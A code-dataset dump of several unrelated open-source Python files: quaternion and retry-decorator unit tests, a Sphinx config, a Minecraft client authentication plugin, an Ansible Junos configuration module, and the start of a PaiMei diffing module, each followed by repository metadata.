q1,q2 = quat(1,1,1,0),quat(1,1,1,0.1)
q3,q4 = quat(1,1,1,1),quat(1,1.000001,1,1)
self.assertEqual(q1.isnear(q1),1)
self.assertEqual(q3.isnear(q3),1)
self.assertEqual(q1.isnear(q2),0)
self.assertEqual(q2.isnear(q1),0)
self.assertEqual(q1.isnear(q3),0)
self.assertEqual(q2.isnear(q3),0)
self.assertEqual(q2.isnear(q4),0)
self.assertEqual(q3.isnear(q4),1)
def test_mag2(self):
q1,q2,q3 = quat(1,0,0,0),quat(1,1,1,0),quat(0,2,5,11)
self.assertEqual(dpr.isnear(q1.mag2(),1),1)
self.assertEqual(dpr.isnear(q2.mag2(),3),1)
self.assertEqual(dpr.isnear(q3.mag2(),150),1)
def test_mag(self):
q1,q2,q3 = quat(1,0,0,0),quat(1,1,1,0),quat(0,2,5,11)
self.assertEqual(dpr.isnear(q1.mag(),1),1)
self.assertEqual(dpr.isnear(q2.mag(),math.sqrt(3)),1)
self.assertEqual(dpr.isnear(q3.mag(),math.sqrt(150)),1)
def test_nrm(self):
q1,q2,q3 = quat(1,0,0,0),quat(1,1,1,0),quat(0,2,5,11)
self.assertEqual(dpr.isnear(q1.cp().nrm().mag(),1),1)
self.assertEqual(dpr.isnear(q2.cp().nrm().mag(),1),1)
self.assertEqual(dpr.isnear(q3.cp().nrm().mag(),1),1)
self.assertTrue(q1.cp().nrm().mag() == q1.mag())
self.assertTrue(q1.nrm() is q1)
self.assertFalse(q2.cp().nrm().mag() == q2.mag())
self.assertTrue(q2.nrm() is q2)
self.assertFalse(q3.cp().nrm().mag() == q3.mag())
self.assertTrue(q3.nrm() is q3)
def test_flp(self):
q1,q2 = quat(1,0,0,0),quat(1,1,1,0)
q3,q4 = quat(0,2,5,11),quat(-1,1,1,0)
self.assertFalse(q1.cp().flp() == q1)
self.assertFalse(q2.cp().flp() == q2)
self.assertTrue(q3.cp().flp() == q3)
self.assertFalse(q4.cp().flp() == q4)
self.assertTrue(q2.cp().flp() == q4)
self.assertTrue(q1.flp() is q1)
self.assertTrue(q2.flp() is q2)
self.assertTrue(q3.flp() is q3)
self.assertTrue(q4.flp() is q4)
def test_uscl(self):
q1,q2 = quat(1,0,0,0),quat(1,1,1,0)
q3,q4 = quat(0,2,5,11),quat(0,1,2.5,5.5)
self.assertTrue(q1.cp().uscl(1) == q1)
self.assertFalse(q1.cp().uscl(3) == q1)
self.assertTrue(q2.cp().uscl(1) == q2)
self.assertFalse(q2.cp().uscl(3) == q2)
self.assertTrue(q3.cp().uscl(0.5) == q4)
self.assertTrue(q1.uscl(1) is q1)
def test_cnj(self):
q1,q2 = quat(1,0,0,0),quat(1,1,1,0)
q3,q4 = quat(-1,2,5,11),quat(1,-2,-5,-11)
self.assertTrue(q1.cp().cnj() == q1)
self.assertTrue(q1.cnj() is q1)
self.assertFalse(q2.cp().cnj() == q2)
self.assertFalse(q3.cnj() == q4)
def test_inv(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.threePI4,vec3(0,0,1)
q1,q2 = quat(1,0,0,0).av(a1,v1),quat(1,1,1,0).av(a2,v2)
self.assertEqual(q1.cp().cnj(),q1.inv())
self.assertEqual(q2.cp().cnj(),q2.inv())
self.assertFalse(q1.inv() is q1)
def test_add(self):
q1,q2 = quat(0.5,0.3,-2.2,3),quat(1,1.1,2,-0.5)
q3 = quat(1.5,1.4,-0.2,2.5)
self.assertEqual(q1.add(q2),q3)
self.assertFalse(q1.add(q2) is q1)
def test_sub(self):
q1,q2 = quat(0.5,0.3,-2.2,3),quat(1,1.1,2,-0.5)
q3 = quat(-0.5,-0.8,-4.2,3.5)
self.assertEqual(q1.sub(q2),q3)
self.assertFalse(q1.sub(q2) is q1)
def test_mul(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.threePI4,vec3(0,0,1)
q1,q2 = quat(1,0,0,0).av(a1,v1),quat(1,1,1,0).av(a2,v1)
q3 = quat(0,1,0,0).av(a1+a2,v2)
self.assertTrue(q1.mul(q2) == q3)
self.assertFalse(q1.mul(q2) is q1)
def test_rot(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.PI2,vec3(0,0,1)
q1,q2 = quat(1,0,0,0).av(a1,v1),quat(1,1,1,0).av(a1,v1)
q3 = quat(0,1,0,0).av(a2,v2)
self.assertTrue(q1.rot(q2) == q3)
self.assertTrue(q1.rot(q2) is q1)
#def test_rotps(self):
def test_dot(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.PI2,vec3(0,1,0)
q1,q2 = quat(1,0,0,0).av(a1,v1),quat(1,1,1,0).av(a1,v1)
q3 = quat(0,1,0,0).av(a2,v2)
q4 = quat(0,1,0,0).av(0,v1)
self.assertTrue(dpr.isnear(q1.dot(q2),q1.mag2()))
self.assertFalse(dpr.isnear(q1.dot(q3),0))
self.assertTrue(dpr.isnear(q3.dot(q4),q3.w))
def test_slerp(self):
a1,v1 = dpr.PI4,vec3(0,0,1)
a2,v2 = dpr.PI,vec3(0,0,1)
q1,q2 = quat(1,0,0,0).av(0,v1),quat(1,1,1,0).av(a1,v1)
q3 = quat(0,1,0,0).av(a2,v2)
self.assertEqual(q1.slerp(q3,0.25),q2)
self.assertFalse(q1.slerp(q3,0.25) is q1)
if __name__ == '__main__':
unittest.main()
| mit | -8,675,543,976,464,371,000 | 33.21608 | 63 | 0.545455 | false |
carlos-jenkins/plantweb | test/sphinxconf/conf.py | 1 | 9536 | # -*- coding: utf-8 -*-
#
# PlantwebTest documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 24 03:02:39 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import unicode_literals, absolute_import
from __future__ import print_function, division
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'plantweb.directive'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'PlantwebTest'
copyright = '2016-2017, Carlos Jenkins'
author = 'Carlos Jenkins'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'PlantwebTestdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
# Latex figure (float) alignment
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
'PlantwebTest.tex',
'PlantwebTest Documentation',
'Carlos Jenkins',
'manual'
),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
master_doc,
'plantwebtest',
'PlantwebTest Documentation',
[author],
1
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
'PlantwebTest',
'PlantwebTest Documentation',
author,
'PlantwebTest',
'One line description of project.',
'Miscellaneous'
),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
| apache-2.0 | -4,205,343,303,474,952,700 | 30.681063 | 79 | 0.692429 | false |
sbunatyan/retrylib | retrylib/tests/test_decorators.py | 1 | 7444 | #!/usr/bin/env python
# Copyright (c) 2014 Sergey Bunatyan <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from retrylib.tests import base
import retrylib
from retrylib import decorators
RETRY_ATTEMPTS = 5
START_DELAY = 0
STEP = 1
MAX_DELAY = 2
class SuperPuperException(Exception):
pass
class DontRetryException(Exception):
pass
class FakeClass(mock.Mock):
@retrylib.retry(RETRY_ATTEMPTS, delay=0)
def retry_method_works_incorrect(self):
self.retry_count()
raise SuperPuperException()
@decorators.retry(RETRY_ATTEMPTS, delay=0,
retry_on=(SuperPuperException,))
def retry_method_works_incorrect_2(self):
self.retry_count()
raise DontRetryException()
@retrylib.retry(RETRY_ATTEMPTS, delay=0)
def retry_method_works_correct(self):
self.retry_count()
@decorators.retry(RETRY_ATTEMPTS, delay=START_DELAY,
step=STEP)
def retry_with_custom_step(self):
self.retry_count()
raise SuperPuperException()
@decorators.retry(RETRY_ATTEMPTS, delay=START_DELAY,
step=STEP, max_delay=MAX_DELAY)
def retry_with_max_delay(self):
self.retry_count()
raise SuperPuperException()
class RetryTestCase(base.TestCase):
def setUp(self):
self._target = FakeClass()
def test_must_retry_three_time_and_raise_exception(self):
self.assertRaises(
SuperPuperException,
self._target.retry_method_works_incorrect)
self.assertEqual(self._target.retry_count.call_count,
RETRY_ATTEMPTS)
def test_must_retry_one_time_and_return_correct_result(self):
self.assertIsNone(self._target.retry_method_works_correct())
self.assertEqual(self._target.retry_count.call_count, 1)
def test_dont_retry_on_unexpected_error(self):
"""Don't retry if exception isn't SuperPuperException"""
self.assertRaises(
DontRetryException,
self._target.retry_method_works_incorrect_2)
self.assertEqual(self._target.retry_count.call_count, 1)
@mock.patch('time.sleep')
def test_step_is_works(self, sleep):
"""Retry delay increases to step value"""
self.assertRaises(
SuperPuperException,
self._target.retry_with_custom_step)
sleep.assert_has_calls([
mock.call(START_DELAY),
mock.call(START_DELAY + STEP)
])
@mock.patch('time.sleep')
def test_max_delay_works(self, sleep):
"""Retry delay increases to step value"""
self.assertRaises(
SuperPuperException,
self._target.retry_with_max_delay)
sleep.assert_has_calls([
mock.call(START_DELAY),
mock.call(START_DELAY + STEP),
mock.call(MAX_DELAY),
mock.call(MAX_DELAY)
])
def test_retry_works_with_function_without_parameters(self):
@decorators.retry(RETRY_ATTEMPTS, delay=0)
def function_without_parameters():
return "OK"
self.assertEqual(function_without_parameters(), "OK")
class LoggerTestCase(base.TestCase):
def setUp(self):
super(LoggerTestCase, self).setUp()
self.logger = mock.MagicMock()
@mock.patch('time.sleep')
def test_works_without_logger(self, sleep):
class Counter(object):
def __init__(self):
self._value = 0
@property
def value(self):
return self._value
def inc(self):
self._value += 1
@decorators.retry(RETRY_ATTEMPTS,
retry_on=(SuperPuperException,))
def bad_function(counter):
counter.inc()
raise SuperPuperException()
counter = Counter()
self.assertRaises(SuperPuperException,
bad_function,
counter)
self.assertEqual(counter.value, RETRY_ATTEMPTS)
@mock.patch('time.sleep')
def test_predefined_logger_is_used(self, sleep):
"""decorators.retry uses logger to write debug information
Decorator writes warning messages about retries.
"""
@decorators.retry(RETRY_ATTEMPTS,
logger=self.logger,
retry_on=(SuperPuperException,))
def bad_function():
raise SuperPuperException()
self.assertRaises(SuperPuperException,
bad_function)
self.assertEqual(self.logger.warning.call_count,
RETRY_ATTEMPTS - 1)
@mock.patch('time.sleep')
def test_object_logger_is_used(self, sleep):
"""decorators.retry uses object's logger"""
class TestClass(object):
def __init__(self):
self.logger = mock.MagicMock()
def get_logger(self):
return self.logger
@decorators.retry(RETRY_ATTEMPTS,
retry_on=(SuperPuperException,))
def reliable_method(self):
raise SuperPuperException()
obj = TestClass()
self.assertRaises(SuperPuperException,
obj.reliable_method)
self.assertEqual(obj.logger.warning.call_count,
RETRY_ATTEMPTS - 1)
@mock.patch('time.sleep')
def test_object_logger_is_used_predefined_is_ignored(self, sleep):
"""decorators.retry ignores predefined logger
In case when object logger is defined.
"""
class TestClass(object):
def __init__(self):
self.logger = mock.MagicMock()
def get_logger(self):
return self.logger
@decorators.retry(RETRY_ATTEMPTS,
logger=self.logger,
retry_on=(SuperPuperException,))
def reliable_method(self):
raise SuperPuperException()
obj = TestClass()
self.assertRaises(SuperPuperException,
obj.reliable_method)
self.assertEqual(self.logger.warning.call_count,
0)
self.assertEqual(obj.logger.warning.call_count,
RETRY_ATTEMPTS - 1)
@mock.patch('time.sleep')
def test_works_if_get_logger_isnt_defined(self, sleep):
"""decorators works if get_logger isn't defined"""
class TestClass(object):
def __init__(self):
pass
@decorators.retry(RETRY_ATTEMPTS,
retry_on=(SuperPuperException,))
def reliable_method(self):
raise SuperPuperException()
obj = TestClass()
self.assertRaises(SuperPuperException,
obj.reliable_method)
| apache-2.0 | -419,754,297,560,335,300 | 28.192157 | 70 | 0.591483 | false |
MrSwiss/SpockBot | spock/plugins/core/auth.py | 1 | 5050 | """
Provides authorization functions for Mojang's login and session servers
"""
import hashlib
import json
# This is for python2 compatibility
try:
import urllib.request as request
from urllib.error import URLError
except ImportError:
import urllib2 as request
from urllib2 import URLError
import logging
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from spock.mcp import yggdrasil
from spock.plugins.base import PluginBase
from spock.utils import pl_announce
logger = logging.getLogger('spock')
backend = default_backend()
# This function courtesy of barneygale
def java_hex_digest(digest):
d = int(digest.hexdigest(), 16)
if d >> 39 * 4 & 0x8:
d = "-%x" % ((-d) & (2 ** (40 * 4) - 1))
else:
d = "%x" % d
return d
class AuthCore(object):
def __init__(self, authenticated, event):
self.event = event
self.authenticated = authenticated
self.username = None
self.selected_profile = None
self.shared_secret = None
self.ygg = yggdrasil.YggAuth()
def start_session(self, username, password=''):
rep = {}
if self.authenticated:
logger.info("AUTHCORE: Attempting login with username: %s",
username)
rep = self.ygg.authenticate(username, password)
if rep is None or 'error' in rep:
logger.error('AUTHCORE: Login Unsuccessful, Response: %s', rep)
self.event.emit('AUTH_ERR')
return rep
if 'selectedProfile' in rep:
self.selected_profile = rep['selectedProfile']
self.username = rep['selectedProfile']['name']
logger.info("AUTHCORE: Logged in as: %s", self.username)
logger.info("AUTHCORE: Selected Profile: %s",
self.selected_profile)
else:
self.username = username
else:
self.username = username
return rep
def gen_shared_secret(self):
self.shared_secret = os.urandom(16)
return self.shared_secret
@pl_announce('Auth')
class AuthPlugin(PluginBase):
requires = ('Event', 'Net')
defaults = {
'authenticated': True,
'auth_quit': True,
'sess_quit': True,
}
events = {
'AUTH_ERR': 'handle_auth_error',
'SESS_ERR': 'handle_session_error',
'LOGIN<Encryption Request': 'handle_encryption_request',
}
def __init__(self, ploader, settings):
super(AuthPlugin, self).__init__(ploader, settings)
self.authenticated = self.settings['authenticated']
self.auth_quit = self.settings['auth_quit']
self.sess_quit = self.settings['sess_quit']
self.auth = AuthCore(self.authenticated, self.event)
self.auth.gen_shared_secret()
ploader.provides('Auth', self.auth)
def handle_auth_error(self, name, data):
if self.auth_quit:
self.event.kill()
def handle_session_error(self, name, data):
if self.sess_quit:
self.event.kill()
# Encryption Key Request - Request for client to start encryption
def handle_encryption_request(self, name, packet):
pubkey_raw = packet.data['public_key']
if self.authenticated:
serverid = java_hex_digest(hashlib.sha1(
packet.data['server_id'].encode('ascii') +
self.auth.shared_secret +
pubkey_raw
))
logger.info(
"AUTHPLUGIN: Attempting to authenticate session with "
"sessionserver.mojang.com")
url = "https://sessionserver.mojang.com/session/minecraft/join"
data = json.dumps({
'accessToken': self.auth.ygg.access_token,
'selectedProfile': self.auth.selected_profile,
'serverId': serverid,
}).encode('utf-8')
headers = {'Content-Type': 'application/json'}
req = request.Request(url, data, headers)
try:
rep = request.urlopen(req).read().decode('ascii')
except URLError:
rep = 'Couldn\'t connect to sessionserver.mojang.com'
if rep != "":
logger.warning("AUTHPLUGIN: %s", rep)
self.event.emit('SESS_ERR')
else:
logger.info("AUTHPLUGIN: Session authentication successful")
pubkey = serialization.load_der_public_key(pubkey_raw, backend)
def encrypt(data):
return pubkey.encrypt(data, padding.PKCS1v15())
self.net.push_packet(
'LOGIN>Encryption Response',
{
'shared_secret': encrypt(self.auth.shared_secret),
'verify_token': encrypt(packet.data['verify_token']),
}
)
self.net.enable_crypto(self.auth.shared_secret)
| mit | -2,816,174,595,662,378,500 | 33.121622 | 79 | 0.588515 | false |
britcey/ansible | lib/ansible/modules/network/junos/junos_config.py | 1 | 12228 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: junos_config
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Manage configuration on devices running Juniper JUNOS
description:
- This module provides an implementation for working with the active
configuration running on Juniper JUNOS devices. It provides a set
of arguments for loading configuration, performing rollback operations
and zeroing the active configuration on the device.
extends_documentation_fragment: junos
options:
lines:
description:
- This argument takes a list of C(set) or C(delete) configuration
lines to push into the remote device. Each line must start with
either C(set) or C(delete). This argument is mutually exclusive
with the I(src) argument.
required: false
default: null
src:
description:
- The I(src) argument provides a path to the configuration file
to load into the remote system. The path can either be a full
system path to the configuration file if the value starts with /
or relative to the root of the implemented role or playbook.
This argument is mutually exclusive with the I(lines) argument.
required: false
default: null
version_added: "2.2"
src_format:
description:
- The I(src_format) argument specifies the format of the configuration
found int I(src). If the I(src_format) argument is not provided,
the module will attempt to determine the format of the configuration
file specified in I(src).
required: false
default: null
choices: ['xml', 'set', 'text', 'json']
version_added: "2.2"
rollback:
description:
- The C(rollback) argument instructs the module to rollback the
current configuration to the identifier specified in the
argument. If the specified rollback identifier does not
exist on the remote device, the module will fail. To rollback
to the most recent commit, set the C(rollback) argument to 0.
required: false
default: null
zeroize:
description:
- The C(zeroize) argument is used to completely sanitize the
remote device configuration back to initial defaults. This
argument will effectively remove all current configuration
statements on the remote device.
required: false
default: null
confirm:
description:
- The C(confirm) argument will configure a time out value for
the commit to be confirmed before it is automatically
rolled back. If the C(confirm) argument is set to False, this
argument is silently ignored. If the value for this argument
is set to 0, the commit is confirmed immediately.
required: false
default: 0
comment:
description:
- The C(comment) argument specifies a text string to be used
when committing the configuration. If the C(confirm) argument
is set to False, this argument is silently ignored.
required: false
default: configured by junos_config
replace:
description:
- The C(replace) argument will instruct the remote device to
replace the current configuration hierarchy with the one specified
in the corresponding hierarchy of the source configuration loaded
from this module.
- Note this argument should be considered deprecated. To achieve
the equivalent, set the I(update) argument to C(replace). This argument
will be removed in a future release. The C(replace) and C(update) argument
is mutually exclusive.
required: false
choices: ['yes', 'no']
default: false
backup:
description:
- This argument will cause the module to create a full backup of
the current C(running-config) from the remote device before any
changes are made. The backup file is written to the C(backup)
folder in the playbook root directory. If the directory does not
exist, it is created.
required: false
default: no
choices: ['yes', 'no']
version_added: "2.2"
update:
description:
- This argument will decide how to load the configuration
data particulary when the candidate configuration and loaded
configuration contain conflicting statements. Following are
accepted values.
C(merge) combines the data in the loaded configuration with the
candidate configuration. If statements in the loaded configuration
conflict with statements in the candidate configuration, the loaded
statements replace the candidate ones.
C(override) discards the entire candidate configuration and replaces
it with the loaded configuration.
C(replace) substitutes each hierarchy level in the loaded configuration
for the corresponding level.
required: false
default: merge
choices: ['merge', 'override', 'replace']
version_added: "2.3"
requirements:
- junos-eznc
notes:
- This module requires the netconf system service be enabled on
the remote device being managed.
- Loading JSON-formatted configuration I(json) is supported
starting in Junos OS Release 16.1 onwards.
"""
EXAMPLES = """
- name: load configure file into device
junos_config:
src: srx.cfg
comment: update config
provider: "{{ netconf }}"
- name: load configure lines into device
junos_config:
lines:
- set interfaces ge-0/0/1 unit 0 description "Test interface"
- set vlans vlan01 description "Test vlan"
comment: update config
provider: "{{ netconf }}"
- name: rollback the configuration to id 10
junos_config:
rollback: 10
provider: "{{ netconf }}"
- name: zero out the current configuration
junos_config:
zeroize: yes
provider: "{{ netconf }}"
- name: confirm a previous commit
junos_config:
provider: "{{ netconf }}"
"""
RETURN = """
backup_path:
description: The full path to the backup file
returned: when backup is yes
type: string
sample: /playbooks/ansible/backup/config.2016-07-16@22:28:34
"""
import re
import json
import sys
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.junos import get_diff, load_config, get_configuration
from ansible.module_utils.junos import junos_argument_spec
from ansible.module_utils.junos import check_args as junos_check_args
from ansible.module_utils.netconf import send_request
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_text, to_native
if sys.version_info < (2, 7):
from xml.parsers.expat import ExpatError
ParseError = ExpatError
else:
ParseError = ElementTree.ParseError
USE_PERSISTENT_CONNECTION = True
DEFAULT_COMMENT = 'configured by junos_config'
def check_args(module, warnings):
junos_check_args(module, warnings)
if module.params['replace'] is not None:
module.fail_json(msg='argument replace is deprecated, use update')
zeroize = lambda x: send_request(x, ElementTree.Element('request-system-zeroize'))
rollback = lambda x: get_diff(x)
def guess_format(config):
try:
json.loads(config)
return 'json'
except ValueError:
pass
try:
ElementTree.fromstring(config)
return 'xml'
except ParseError:
pass
if config.startswith('set') or config.startswith('delete'):
return 'set'
return 'text'
def filter_delete_statements(module, candidate):
reply = get_configuration(module, format='set')
match = reply.find('.//configuration-set')
if match is None:
# Could not find configuration-set in reply, perhaps device does not support it?
return candidate
config = to_native(match.text, encoding='latin1')
modified_candidate = candidate[:]
for index, line in reversed(list(enumerate(candidate))):
if line.startswith('delete'):
newline = re.sub('^delete', 'set', line)
if newline not in config:
del modified_candidate[index]
return modified_candidate
def configure_device(module, warnings):
candidate = module.params['lines'] or module.params['src']
kwargs = {
'comment': module.params['comment'],
'commit': not module.check_mode
}
if module.params['confirm'] > 0:
kwargs.update({
'confirm': True,
'confirm_timeout': module.params['confirm']
})
config_format = None
if module.params['src']:
config_format = module.params['src_format'] or guess_format(str(candidate))
if config_format == 'set':
kwargs.update({'format': 'text', 'action': 'set'})
else:
kwargs.update({'format': config_format, 'action': module.params['update']})
if isinstance(candidate, string_types):
candidate = candidate.split('\n')
# this is done to filter out `delete ...` statements which map to
# nothing in the config as that will cause an exception to be raised
if any((module.params['lines'], config_format == 'set')):
candidate = filter_delete_statements(module, candidate)
kwargs['format'] = 'text'
kwargs['action'] = 'set'
return load_config(module, candidate, warnings, **kwargs)
def main():
""" main entry point for module execution
"""
argument_spec = dict(
lines=dict(type='list'),
src=dict(type='path'),
src_format=dict(choices=['xml', 'text', 'set', 'json']),
# update operations
update=dict(default='merge', choices=['merge', 'override', 'replace', 'update']),
# deprecated replace in Ansible 2.3
replace=dict(type='bool'),
confirm=dict(default=0, type='int'),
comment=dict(default=DEFAULT_COMMENT),
# config operations
backup=dict(type='bool', default=False),
rollback=dict(type='int'),
zeroize=dict(default=False, type='bool'),
)
argument_spec.update(junos_argument_spec)
mutually_exclusive = [('lines', 'src', 'rollback', 'zeroize')]
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False, 'warnings': warnings}
if module.params['backup']:
for conf_format in ['set', 'text']:
reply = get_configuration(module, format=conf_format)
match = reply.find('.//configuration-%s' % conf_format)
if match is not None:
break
else:
module.fail_json(msg='unable to retrieve device configuration')
result['__backup__'] = match.text.strip()
if module.params['rollback']:
if not module.check_mode:
diff = rollback(module)
if module._diff:
result['diff'] = {'prepared': diff}
result['changed'] = True
elif module.params['zeroize']:
if not module.check_mode:
zeroize(module)
result['changed'] = True
else:
diff = configure_device(module, warnings)
if diff:
if module._diff:
result['diff'] = {'prepared': diff}
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -4,767,133,261,227,598,000 | 32.966667 | 89 | 0.66454 | false |
Alwnikrotikz/paimei | console/modules/_PAIMEIdiff/DiffModules/crc.py | 1 | 2243 | #
# $Id$
#
from defines import *
class crc:
def __init__(self, parent=None):
self.attributes = {} # initialize attributes
self.attributes["Match"] = 1 # Match attribute set to 1 tells the main program we can be used to match
self.attributes["Diff"] = 1 # Diff attribute set to 1 tells the main program we can be used to diff
self.attributes["Level"] = FUNCTION_LEVEL | BASIC_BLOCK_LEVEL # these flags indicated we can diff/match both functions and basic blocks
self.parent = parent # set up the parent
self.module_name = "CRC" # give the module a name
self.author = "Peter Silberman" # author name
self.description = "CRC module uses the crc signature"
self.date = "09/22/06"
self.homepage = "http://www.openrce.org"
self.contact = "[email protected]"
self.accuracy = ACCURACY_HIGH
self.parent.register_match_function( self.match_function_by_crc, self ) # register a function matching routine
